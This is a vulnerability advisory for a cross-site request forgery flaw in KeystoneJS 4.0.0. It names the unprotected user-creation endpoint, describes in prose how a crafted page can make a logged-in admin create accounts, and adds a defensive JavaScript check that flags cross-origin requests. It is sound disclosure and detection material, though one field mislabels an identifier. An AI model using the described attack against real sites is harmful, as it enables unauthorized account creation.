vendor: Keystone
by: Saurabh Banawar
CVSS: 8.8 (HIGH)
CWE: 352, Cross-Site Request Forgery (CSRF)
Product Name: Keystone
Affected Version From: 4.0.0
Affected Version To: 4.0.0
Patch Exists: YES
Related CWE: 2017-16570
CPE: a:keystonejs:keystone
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Windows 8.1
2017
Application wide CSRF Bypass
A CSRF vulnerability was discovered in KeystoneJS 4.0.0 which allows an attacker to bypass the CSRF protection and create a new user. The vulnerability exists due to the lack of CSRF protection for the /keystone/api/users/create endpoint. An attacker can craft a malicious HTML page and trick a logged-in user into submitting the form, resulting in a new user being created.
Mitigation:
The vendor has released a patch to address this vulnerability. It is recommended to upgrade to the latest version of KeystoneJS.
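A defender-side check for the request pattern described above, as an added example (not KeystoneJS code and not from the advisory's author): it classifies state-changing requests to `/keystone/api/users/create` by comparing the `Origin` or `Referer` header with the site's own origin. The site origin, the record shape and the sample requests are constructed assumptions.

```javascript
// Added example: flag likely forged requests to the endpoint named in the advisory.
const SITE_ORIGIN = "https://cms.example.test";      // assumption: the admin UI's own origin
const SENSITIVE_PATH = "/keystone/api/users/create"; // endpoint taken from the advisory
const STATE_CHANGING = new Set(["POST", "PUT", "PATCH", "DELETE"]);

// Return the origin that initiated the request, or null if it cannot be determined.
function sourceOrigin(headers) {
  const h = {};
  for (const [k, v] of Object.entries(headers || {})) h[k.toLowerCase()] = v;
  // Prefer Origin; fall back to Referer when Origin is absent or unusable ("null").
  for (const candidate of [h["origin"], h["referer"]]) {
    if (!candidate) continue;
    try {
      return new URL(candidate).origin;
    } catch (_) {
      continue; // malformed or opaque value: try the next header
    }
  }
  return null;
}

// Classify one request record as "ok", "cross-origin" or "unknown-origin".
function classify(req, siteOrigin = SITE_ORIGIN) {
  const path = req.path.split("?")[0];
  if (!STATE_CHANGING.has(req.method.toUpperCase()) || path !== SENSITIVE_PATH) return "ok";
  const src = sourceOrigin(req.headers);
  if (src === null) return "unknown-origin"; // no usable header: review or reject
  return src === siteOrigin ? "ok" : "cross-origin";
}

// Constructed sample records (not real traffic).
const sampleRequests = [
  { method: "POST", path: SENSITIVE_PATH, headers: { Origin: "https://cms.example.test" } },
  { method: "POST", path: SENSITIVE_PATH, headers: { Origin: "https://unrelated.example.test" } },
  { method: "POST", path: SENSITIVE_PATH, headers: { Referer: "https://unrelated.example.test/page.html" } },
  { method: "POST", path: SENSITIVE_PATH, headers: { Origin: "null" } },
  { method: "GET", path: "/keystone/users", headers: { Referer: "https://unrelated.example.test/" } },
];

function classifyAll(requests) {
  return requests.map((r) => classify(r));
}

console.log(classifyAll(sampleRequests));
```

The same comparison can run as a log query for review after the fact or as a request filter in front of the application; it complements the vendor patch and does not replace it.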